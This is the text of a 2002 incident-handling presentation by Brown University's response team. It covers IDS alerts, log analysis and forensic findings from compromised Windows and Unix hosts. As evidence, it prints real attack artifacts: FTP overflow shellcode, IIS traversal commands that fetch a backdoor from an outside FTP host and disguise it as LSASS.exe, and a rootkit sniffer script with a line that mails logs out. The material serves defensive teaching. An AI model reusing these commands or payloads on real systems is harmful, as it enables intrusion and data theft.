580 likes | 721 Views
Adventures In Incident Handling. Paul Asadoorian, GCIA Brown University August 16, 2002 MIT Security Camp. Outline. Incident Handling @ Brown University Incident Discovery Processes Containing the damage Analyzing the results Recovery Learning from the experiences.
E N D
Adventures In Incident Handling Paul Asadoorian, GCIA Brown University August 16, 2002 MIT Security Camp
Outline • Incident Handling @ Brown University • Incident Discovery Processes • Containing the damage • Analyzing the results • Recovery • Learning from the experiences Paul Asadoorian, Brown University CIRT
The Brown University CIRT • CIRT (Computer Incident Response Team) • Formed in Mid-December 2001 • Consists of members of technical teams and management within the computing and information services department Paul Asadoorian, Brown University CIRT
The Brown University CIRT • Identify categories of malicious activity threatening Brown University's computing and information services. • Coordinate appropriate responses to counter malicious threats • Codify group level response procedures so that there is archival documentation and understanding of roles across CIS groups Paul Asadoorian, Brown University CIRT
The Brown University CIRT • Review and recommend appropriate new policy or updates to existing policies to CIS management • Be aware of developing security issues affecting computing and information services • Work with the Help Desk and Computer Education to raise user's awareness of computing best practices and security issues Paul Asadoorian, Brown University CIRT
The Brown University CIRT • Respond to Incidents using the six step process: • Preparation • Identification • Containment • Eradication • Recovery • Lessons Learned • Primary Incident Handlers: • Paul Asadoorian • Suzanne Coski Paul Asadoorian, Brown University CIRT
CIRT - Authorization • Get permission • Security Assessment and Audit Authorization: • “When requested, any access required for the purpose of performing an audit or responding to a computer security incident will be provided to members of Brown University's Information Security team. “ • Also permits use of “legitimate” security auditing tools Paul Asadoorian, Brown University CIRT
CIRT – Remedy Form Paul Asadoorian, Brown University CIRT
CIRT – Remedy Form Paul Asadoorian, Brown University CIRT
CIRT – Jump Bag • Laptop with appropriate software • Networking hub and cables • Cell phone • Campus phone directory • Linux/windows boot disks • Operating System CD’s • Tape/Disk/CDRW backup media Paul Asadoorian, Brown University CIRT
Local Contacts • Strengthened Brown’s Systems Administrators group • Monthly meetings and newsletters • Email: SysAdmins@brown.edu • Web:http://www.brown.edu/Research/SysAdmins/ Paul Asadoorian, Brown University CIRT
Contacting CIRT • Email: CIRT@brown.edu • Web: http://www.brown.edu/Facilities/CIS/CIRT/ Paul Asadoorian, Brown University CIRT
Incident Discovery • Intrusion Detection System • Logs (Firewall, Systems, Routers) • 3rd Party • Panicking Systems Administrators Paul Asadoorian, Brown University CIRT
Incident Discovery: IDS • Currently monitoring all incoming and outgoing Internet and Internet2 traffic • Spikes up to 300mb/s • Does not catch attacks that occur on campus only Paul Asadoorian, Brown University CIRT
Incident Discovery: IDS • Snort (www.snort.org) • TopLayer Networks IDS Load Balancer (www.toplayer.com) • MySQL, ACID, Apache, SSH • SSH for rule management Paul Asadoorian, Brown University CIRT
Incident Discovery: IDS Paul Asadoorian, Brown University CIRT
Incident Discovery: IDS #(1 - 2420) [2002-07-02 11:52:25] [arachNIDS/287] FTP EXPLOIT wu-ftpd 2.6.0 linux overflow IPv4: 203.184.173.249 -> MY.SUB.NET.8 hlen=5 TOS=48 dlen=350 ID=7510 flags=0 offset=0 TTL=46 chksum=8390 TCP: port=36269 -> dport: 21 flags=***AP*** seq=2161363806 ack=3044544837 off=5 res=0 win=5840 urp=0 chksum=65114 Payload: length = 301 000 : 50 41 53 53 20 90 90 90 90 90 90 90 90 90 90 90 PASS ........... 010 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 020 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 030 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 040 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 050 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 060 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 070 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 080 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 090 : 90 90 90 90 31 C0 31 DB 31 C9 B0 46 CD 80 31 C0 ....1.1.1..F..1. 0a0 : 31 DB 43 89 D9 41 B0 3F CD 80 EB 6B 5E 31 C0 31 1.C..A.?...k^1.1 0b0 : C9 8D 5E 01 88 46 04 66 B9 B0 27 CD 80 31 C0 8D ..^..F.f..'..1.. 0c0 : 5E 01 B0 3D CD 80 31 C0 31 DB 8D 5E 08 89 43 02 ^..=..1.1..^..C. 0d0 : 31 C9 FE C9 31 C0 8D 5E 08 B0 0C CD 80 FE C9 75 1...1..^.......u 0e0 : F3 31 C0 88 46 09 8D 5E 08 B0 3D CD 80 FE 0E B0 .1..F..^..=..... 0f0 : 30 FE C8 88 46 04 31 C0 88 46 07 89 76 08 89 46 0...F.1..F..v..F 100 : 0C 89 F3 8D 4E 08 8D 56 0C B0 0B CD 80 31 C0 31 ....N..V.....1.1 110 : DB B0 01 CD 80 E8 90 30 62 69 6E 30 73 68 31 2E .......0bin0sh1. 120 : 2E 31 31 40 61 6F 6C 2E 63 6F 6D 0D 0A .11@aol.com..
Incident Discovery: IDS #(5 - 51010) [2002-07-22 14:23:36] ATTACK RESPONSES id check returned Root IPv4: MY.SUB.NET.126 -> 202.100.254.163 hlen=5 TOS=0 dlen=76 ID=53672 flags=0 offset=0 TTL=63 chksum=58344 TCP: port=22 -> dport: 1060 flags=***AP*** seq=306540118 ack=513337267 off=8 res=0 win=31856 urp=0 chksum=64269 Options: #1 - NOP len=0 #2 - NOP len=0 #3 - TS len=10 data=074F58920054721D Payload: length = 24 000 : 75 69 64 3D 30 28 72 6F 6F 74 29 20 67 69 64 3D uid=0(root) gid= 010 : 30 28 72 6F 6F 74 29 0A 0(root). Paul Asadoorian, Brown University CIRT
Incident Discovery: IDS Jul 22 15:17:08 mtsnow snort: [1:1326:1] EXPLOIT ssh CRC32 overflow NOOP [Classification: Executable code was detected] [Priority: 1]: {TCP} 202.100.254.163:1040 -> MY.SUB.NET.126:22 <Repeats 9 more times> Jul 22 14:23:36 crestedb snort: [1:498:2] ATTACK RESPONSES id check returned root [Classification: Potentially Bad Traffic] [Priority: 2]: {TCP} MY.SUB.NET.126:22 -> 202.100.254.163:1060 Paul Asadoorian, Brown University CIRT
Incident Discovery: Firewall Logs • Firewall protects our critical infrastructure • Isolated Subnet with no machines • Simply logs any traffic going to this subnet • Approx 90,000 packets logged per month Paul Asadoorian, Brown University CIRT
Incident Discovery: Firewall Logs Paul Asadoorian, Brown University CIRT
Incident Discovery: Firewall Logs Jul 24 00:14:57 fw.brown.edu ns1000: NetScreen Traffic Log: device_id=91010053 start_time="07/24/2002 00:06:13" src=MY.SUB.NET.13 dst=216.200.107.27 src_port=2444 dst_port=80 service=http proto=6 policy_id=88 direction=outgoing duration=0 sent=0 rcvd=0 action=Deny vsys=admin Jul 24 00:14:59 fw.brown.edu ns1000: NetScreen Traffic Log: device_id=91010053 start_time="07/24/2002 00:06:16" src=MY.SUB.NET.13 dst=216.200.107.27 src_port=2444 dst_port=80 service=http proto=6 policy_id=88 direction=outgoing duration=0 sent=0 rcvd=0 action=Deny vsys=admin Aug 5 09:01:38 fw.brown.edu ns1000: NetScreen Traffic Log: device_id=91010053 start_time="08/05/2002 08:52:41" src=MY.SUB.NET.13 dst=129.250.156.30 src_port=3661 dst_port=80 service=http proto=6 policy_id=88 direction=outgoing duration=0 sent=0 rcvd=0 action=Deny vsys=admin Aug 5 09:01:40 fw.brown.edu ns1000: NetScreen Traffic Log: device_id=91010053 start_time="08/05/2002 08:52:44" src=MY.SUB.NET.13 dst=129.250.156.30 src_port=3661 dst_port=80 service=http proto=6 policy_id=88 direction=outgoing duration=0 sent=0 rcvd=0 action=Deny vsys=admin Paul Asadoorian, Brown University CIRT
Incident Discovery: System Logs 216.167.77.217, user1, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 331, 0, [100]USER, user1,, 216.167.77.217, -, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 204, 0, 0, 530, 1326, [100]PASS, -, -, 216.167.77.217, user1, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 331, 0, [101]USER, user1,, 216.167.77.217, -, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 141, 0, 0, 530, 1326, [101]PASS, -, -, 216.167.77.217, user1, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 15, 0, 0, 331, 0, [100]USER, user1, -, 216.167.77.217, -, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 530, 1326, [100]PASS, -, -, 216.167.77.217, user1, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 331, 0, [101]USER, user1,-, 216.167.77.217, user1, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 331, 0, [102]USER, user1, -, 216.167.77.217, user1, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 331, 0, [103]USER, user1, -, 216.167.77.217, -, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 530, 1326, [101]PASS, -, -, Paul Asadoorian, Brown University CIRT
Incident Discovery: System Logs 3/6/02 6:14:45 PM Security Failure Audit Logon/Logoff 539 NT AUTHORITY\SYSTEM <System Name> Logon Failure: Reason: Account locked out User Name: ftptest Domain: WIN07147 Logon Type: 3 Logon Process: KSecDD Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0 Workstation Name: \\WIN07147 Paul Asadoorian, Brown University CIRT
Incident Discovery: System Logs 2002-03-24 21:13:08 204.141.115.253 - MY.SUB.NET.233 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+copy+c:\winnt\system32\cmd.exe+c:\command.exe 502 2002-03-24 21:13:11 204.141.115.253 - MY.SUB.NET.233 80 GET /scripts/..%5c../command.exe /c+echo+nltestsite>>c:\config.txt 502 2002-03-24 21:13:13 204.141.115.253 - MY.SUB.NET.233 80 GET/scripts/..%5c../command.exe /c+echo+nolimit>>c:\config.txt 502 2002-03-24 21:13:18 204.141.115.253 - MY.SUB.NET.233 80 GET /scripts/..%5c../command.exe /c+echo+get%20/secret/ServUDaemon.ini%20c:\test.ini>>c:\co nfig.txt 502 Paul Asadoorian, Brown University CIRT
copy c:\winnt\system32\cmd.exe c:\command.exe Echo nltestsite>>c:\config.txt Echo nolimit>>c:\config.txt Echo get /secret/ServUDaemon.ini c:\test.ini>>c:\config.txt Echo get /secret/dirchange.tx c:\dirchange.txt>>c:\config.txt Echo binary>>c:\config.txt Echo get /secret/ServUDaemon.exe c:\test.exe>>c:\config.txt Echo bye>>c:\config.txt ftp.exe -s:c:\config.txt nltestsite.hypermart.net Mkdir c:\RECYCLER\S-1-5-21-1065036112-524770614-4547331-501 Copy c:\test.exe c:\RECYCLER\S-1-5-21-1065036112-524770614-4547331-501\LSASS.exe Copy c:\test.ini c:\RECYCLER\S-1-5-21-1065036112-524770614-4547331-501\WINNT.dll Copy c:\dirchange.txt c:\RECYCLER\S-1-5-21-1065036112-524770614-4547331-501\system32.dll del+c:\test.ini del+c:\test.exe del+c:\config.txt dir+c:\RECYCLER\S-1-5-21-1065036112-524770614-4547331-501 del+c:\config.txt del+c:\config.txt c:\RECYCLER\S-1-5-21-1065036112-524770614-4547331-501\LSASS.exe c:\RECYCLER\S-1-5-21 1065036112-524770614-4547331-501\WINNT.dll Paul Asadoorian, Brown University CIRT
Incident Discovery: Router Logs Jul 30 17:49:19 router.mydomain.edu 10124: Jul 30 16:49:18: %SEC-6-IPACCESSLOGDP: list 104 denied icmp 10.1.1.66 (GigabitEthernet4/0/0 0030.b6d2.08fc) -> 193.0.0.11 (0/0), 2 packets Jul 30 18:51:22 router.mydomain.edu 10173: Jul 30 17:51:21: %SEC-6-IPACCESSLOGDP: list 104 denied icmp 10.1.1.66 (GigabitEthernet4/0/0 0030.b6d2.08fc) -> 217.151.0.18 (0/0), 1 packet Jul 30 18:52:37 router.mydomain.edu 10176: Jul 30 17:52:36: %SEC-6-IPACCESSLOGDP: list 104 denied icmp 10.1.1.6 (GigabitEthernet4/0/0 00d0.bcee.8ec0) -> 68.59.35.47 (0/0), 1 packet Jul 30 18:55:32 router.mydomain.edu 10179: Jul 30 17:55:31: %SEC-6-IPACCESSLOGDP: list 104 denied icmp 10.1.1.66 (GigabitEthernet4/0/0 0030.b6d2.08fc) -> 128.8.7.4 (0/0), 1 packet Jul 30 18:57:21 router.mydomain.edu 10181: Jul 30 17:57:20: %SEC-6-IPACCESSLOGDP: list 104 denied icmp 10.1.1.66 (GigabitEthernet4/0/0 0030.b6d2.08fc) -> 217.151.0.18 (0/0), 5 packets Jul 30 18:58:21 router.mydomain.edu 10182: Jul 30 17:58:20: %SEC-6-IPACCESSLOGDP: list 104 denied icmp 10.1.1.6 (GigabitEthernet4/0/0 00d0.bcee.8ec0) -> 68.59.35.47 (0/0), 2 packets Paul Asadoorian, Brown University CIRT
Incident Discovery: 3rd party You are receiving this notice since your address is listed as the contact in the ARIN database for IP address MY.SUB.NET.79.The following Nimda Worm intrusion attempt was made against SOMEONEELSESDOMAIN.COM.DATE/TIME: Aug-13-2002 (05:52:00) [UTC]SOURCE : MY.SUB.NET.79DEST : 172.213.167.32ATTEMPT : /scripts/root.exe?/c+dirPlease advise your user that their system has been compromised and is being actively utilized as an attack launchpoint against other systems.Thank you for your prompt attention to this matter.-Early Bird v2.6 (http://www.treachery.net/earlybird/) Paul Asadoorian, Brown University CIRT
Incident Discovery: Panicking Systems Administrator • I “Think” I’ve been hacked • I’ve been hacked, help! • I was hacked, didn’t I tell you? Paul Asadoorian, Brown University CIRT
.,gg,. .,gg,. `$$$$$. .$$$$$' `$$$$$. .$$$$$' .,g%d$"^"$b%y,. .,g%d$"^"$b%y,..,g%d$"^"$b%y,. `$$$$$. .$$$$$'g$$$$' `$$$$y..g$$$$' .g$$$$' `""' $$$$$$$$$$$$.l$$$$: :$$$$ll$$$$: johnny l$$$$: g%d$$b%y,. .$$$$$'""`$$$$$.$$$$$p g$$$$$'l$$$$: seven l$$$$: l$$$$: .$$$$$' `$$$$$.`^"$b%y,.,g%d~"^' `"--"' `^"$b%y,.,g%d~"^' .$$$$$' `$$$$$. `""""' `""""' you can stop one, but you can NOT stop all of us! -------### Powered By X-ORG ###------- -------### ###------- -------### ToRn, Danny-Boy, Apache ###------- -------### Dimfate, Angelz, Annihilat ###------- -------### JNX, _random, Beast ###------- -------### W_Knight, Markland ###------- -------### |mojo69| ###-------Dear System Admin,Your system was recently compromised by X-ORG.. We patched the security hole used to compromise your system, Please note, no data on your system was stolen or damaged in any shape of form, nor was this ever our intention. We simply installed some backdoors to permit us to access to the system again.If you would like to contact us regarding any security issues or even simply for a chat, please email..XORG@mailroom.com or you can find us on #etcpub @ IRCnet.X-Organisation."IN THE NAME OF BEXTER!" - EOF -X-Org SunOS Rootkit v2.5DXE - By JudgeD/Danny-Boy Paul Asadoorian, Brown University CIRT
Containing the damage • Filter from the network on local router • Prefer port disabling on switch • Tracking and clean-up • Hey I got a new address and I can’t get to the Internet? Paul Asadoorian, Brown University CIRT
Analyzing the results: Windows bash-2.05# nmap -p1-65535 MY.SUB.NET.144 Starting nmap V. 3.00 ( www.insecure.org/nmap/ ) Interesting ports on host.domain.myuniv.edu (MY.SUB.NET.144): (The 65529 ports scanned but not shown below are in state: closed) Port State Service 135/tcp open loc-srv 139/tcp open netbios-ssn 1029/tcp open ms-lsa 1031/tcp open iad2 6129/tcp open unknown 7614/tcp open unknown Nmap run completed -- 1 IP address (1 host up) scanned in 31 seconds Paul Asadoorian, Brown University CIRT
Analyzing the results: Windows • Connect to ports and see what’s interesting: bash-2.05# nc MY.SUB.NET.144 7614 "Wollf Remote Manager" v1.4 Code by wollf, http://www.xfocus.org [500105@C:\WINNT\system32]# Paul Asadoorian, Brown University CIRT
Analyzing the Results: Windows Starting nmap V. 3.00 ( www.insecure.org/nmap/ ) Interesting ports on host.mydomain.edu (MY.SUB.NET.84): (The 65528 ports scanned but not shown below are in state: closed) Port State Service 113/tcp open auth 135/tcp open loc-srv 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1027/tcp open IIS 1517/tcp open vpac 57970/tcp open unknown Nmap run completed -- 1 IP address (1 host up) scanned in 65 seconds Paul Asadoorian, Brown University CIRT
Analyzing the Results: Windows bash-2.05# nc MY.SUB.NET.84 57970 220-Serv-U FTP Server v3.0 for WinSock ready... 220- 220--Server Stats 220-Uptime: 5 days 15 hours 4 mins 220-Files downloaded: 76 Total: 952044 Kb 220-Files uploaded: 326 Total: 7621646 Kb 220-Current Speed: 0.000 Kb/sec 220-Average Speed: 17.632 Kb/sec 220- 220--User Stats 220-Users logged in: 1 / -1 220-Total logged in users: 61 220-Users in last 24hrs: 7 220- 220-################################ Paul Asadoorian, Brown University CIRT
Analyzing the Results: Windows • What we find: • LSASS.exe • ispc.exe • system32.dll • SERVICES.EXE • nc.exe • xdcc • ServUStartUpLog.txt • servudaemon.ini • xdcc.bat • Slave.exe • srvany.exe Paul Asadoorian, Brown University CIRT
Analyzing the Results: Windows • ServU-FTP Server • IROffer – IRC BOT to distribute files • Fire Daemon – Run any program as a service Paul Asadoorian, Brown University CIRT
Analyzing the Results: Windows • Hiding in the trash: @echo off c: cd\RECYCLER\S-1-5-21-1065036112-524770614-4547331-501\xdcc iroffer.exe my.config Paul Asadoorian, Brown University CIRT
Analyzing the Results: Windows • Movies • Video Games • Software • Adult Material Paul Asadoorian, Brown University CIRT
Analyzing the Results: Windows • How They get in: • NetBIOS Null Sessions • Blank or weak Administrator passwords • Unpatched IIS Servers Paul Asadoorian, Brown University CIRT
Analyzing the Results: Unix Jun 16 16:51:27 moab snort: [1:241:2] DDOS shaft synflood [Classification: Attempted Denial of Service] [Priority: 2]: {TCP} MY.SUB.NET.244:1332 -> 195.210.91.83:1 Jun 16 16:51:27 tsali snort: [1:241:2] DDOS shaft synflood [Classification: Attempted Denial of Service] [Priority: 2]: {TCP} MY.SUB.NET.23:1702 -> 195.210.91.83:4 Jun 16 12:08:42 mtsnow snort: [1:241:2] DDOS shaft synflood [Classification: Attempted Denial of Service] [Priority: 2]: {TCP} MY.SUB.NET.54:1853 -> 195.210.91.83:3 Jun 16 12:18:25 vail snort: [1:241:2] DDOS shaft synflood [Classification: Attempted Denial of Service] [Priority: 2]: {TCP} MY.SUB.NET.75:1639 -> 195.210.91.83:10113 Jun 16 16:51:27 durango snort: [1:241:2] DDOS shaft synflood [Classification: Attempted Denial of Service] [Priority: 2]: {TCP} MY.SUB.NET.68:1893 -> 195.210.91.83:5 Paul Asadoorian, Brown University CIRT
Analyzing the Results: Unix #(1 - 260297) [2002-06-25 01:51:43] [arachNIDS/05] SCAN nmap fingerprint attempt IPv4: 212.41.197.9 -> MY.SUB.NET.55 TCP: port=36454 -> dport: 7 flags=**U*P*SF seq=1150844814 #(2 - 251812) [2002-06-25 00:46:39] [arachNIDS/28] SCAN nmap TCP IPv4: 212.41.197.9 -> MY.SUB.NET.55 TCP: port=36455 -> dport: 7 flags=***A**** seq=1927116476 #(2 - 251813) [2002-06-25 00:47:07] [arachNIDS/05] SCAN nmap fingerprint attempt IPv4: 212.41.197.9 -> MY.SUB.NET.55 TCP: port=36454 -> dport: 7 flags=**U*P*SF seq=1150844814 #(3 - 259687) [2002-06-25 06:23:10] [arachNIDS/28] SCAN nmap TCP IPv4: 212.41.197.9 -> MY.SUB.NET.55 TCP: port=36457 -> dport: 1 flags=***A**** seq=1927116476 Paul Asadoorian, Brown University CIRT
Analyzing the Results: Unix #(5 - 254473) [2002-06-25 04:26:55] [Bugtraq/2347] [CVE/CVE-2001-0144] EXPLOIT ssh CRC32 overflow /bin/sh IPv4: 62.211.128.72 -> MY.SUB.NET.55 hlen=5 TOS=48 dlen=473 ID=58947 flags=0 offset=0 TTL=46 chksum=43204 TCP: port=1527 -> dport: 22 flags=***AP*** seq=1074100681 ack=3278036958 off=8 res=0 win=16060 urp=0 chksum=62278 Options: #1 - NOP len=0 #2 - NOP len=0 #3 - TS len=10 data=02AD419900648C52 Payload: length = 421 Paul Asadoorian, Brown University CIRT
Analyzing the Results: Unix #(3 - 260901) [2002-06-25 18:35:41] ATTACK RESPONSES id check returned root^M IPv4: 206.252.192.195 -> MY.SUB.NET.55 hlen=5 TOS=0 dlen=1500 ID=64118 flags=0 offset=0 TTL=53 chksum=47327^M TCP: port=6667 -> dport: 32885 flags=***A**** seq=3486885204^M ack=1549233503 off=5 res=0 win=8610 urp=0 chksum=45928^M Payload: length = 1460^M <snip> 510 : 6E 65 74 20 4B 6F 62 65 7C 65 73 5A 7C 20 48 40 net Kobe|esZ| H@^M 520 : 20 3A 30 20 75 69 64 3D 30 28 72 6F 6F 74 29 20 :0 uid=0(root) ^M 530 : 67 69 64 3D 30 28 72 6F 6F 74 29 0D 0A 3A 69 72 gid=0(root)..:ir^M 540 : 63 2D 31 2E 73 74 65 61 6C 74 68 2E 6E 65 74 20 c-1.stealth.net ^M 550 : 33 35 32 20 4D 6F 6E 69 6E 6F 20 23 69 67 6E 6F 352 Monino #igno^M 560 : 74 6F 20 7E 69 72 63 6E 65 74 20 32 31 33 2D 31 to ~ircnet 213-1^M 570 : 34 30 2D 31 32 2D 32 31 38 2E 66 61 73 74 72 65 40-12-218.fastre^M 580 : 73 2E 6E 65 74 20 2A 2E 65 64 69 73 6F 6E 74 65 s.net *.edisonte^M <snip> Paul Asadoorian, Brown University CIRT
Analyzing the Results: Unix bash-2.05# nmap -sS -p1-65535 MY.SUB.NET.55 Starting nmap V. 2.53 by fyodor@insecure.org (www.insecure.org/nmap/ ) Interesting ports on marcia.geo.brown.edu (MY.SUB.NET.55): (The 65491 ports scanned but not shown below are in state: closed) Port State Service <Snip> 22/tcp open ssh 23/tcp open telnet 25/tcp open smtp <Snip> 8888/tcp open sun-answerbook 9010/tcp open unknown 22273/tcp open wnn6 25000/tcp open unknown 32771/tcp open sometimes-rpc5 <Snip> Paul Asadoorian, Brown University CIRT
Analyzing the Results: Unix bash-2.05#telnet MY.SUB.NET.55 25000 Trying MY.SUB.NET.55... Connected to MY.SUB.NET.55. Escape character is '^]'. SSH-1.5-1.2.25 ^] Paul Asadoorian, Brown University CIRT
Analyzing the Results: Unix • /dev/pts/01 • Rootkit • /dev/prom • Sn.l • dos • /usr/lib • Ldlibnet.so • Lpstart • Lpset Paul Asadoorian, Brown University CIRT
Analyzing the Results: Unix Lpstart: set EMAIL_ADDRESS angelz1578@usa.net touch /dev/prom/sn.l #cat /dev/prom/sn.l|mail ${EMAIL_ADDRESS} >/dev/null echo "Restart on `date`" >>/dev/prom/sn.l if test -f /dev/prom/dos ;then cd /usr/lib ./lpq fi nohup /usr/lib/lpset -s -d 512 -i /dev/eri -o /dev/prom/sn.l >/dev/null & Paul Asadoorian, Brown University CIRT
Analyzing the Results: Unix Contents of /dev/prom/sn.l: -- TCP/IP LOG -- TM: Tue Jun 25 06:31:17 -- PATH: 163.178.101.249(ftp) => marcia(ftp) STAT: Tue Jun 25 06:31:17, 2 pkts, 0 bytes [TH_RST] DATA: -- -- TCP/IP LOG -- TM: Tue Jun 25 08:16:38 -- PATH: roc-24-24-47-93.rochester.rr.com(ftp) => marcia(ftp) STAT: Tue Jun 25 08:16:39, 2 pkts, 0 bytes [TH_RST] DATA: -- Paul Asadoorian, Brown University CIRT
Analyzing the Results: Unix -- TCP/IP LOG -- TM: Tue Jun 25 05:54:50 -- PATH: hackedsystem(32873) => hacker.ftpsite.com(ftp) STAT: Tue Jun 25 05:55:50, 33 pkts, 232 bytes [TH_FIN] : DATA: USER reiregna : PASS assamalaka : CWD images : PORT MY,SUB,NET,55,128,106 : RETR sunpsy.tgz : PORT MY,SUB,NET,55,128,107 : NLST -al : PORT MY,SUB,NET,55,128,108 : RETR sun.tgz : TYPE I : PORT MY,SUB,NET,55,128,109 : RETR sunpsy.tgz : QUIT Paul Asadoorian, Brown University CIRT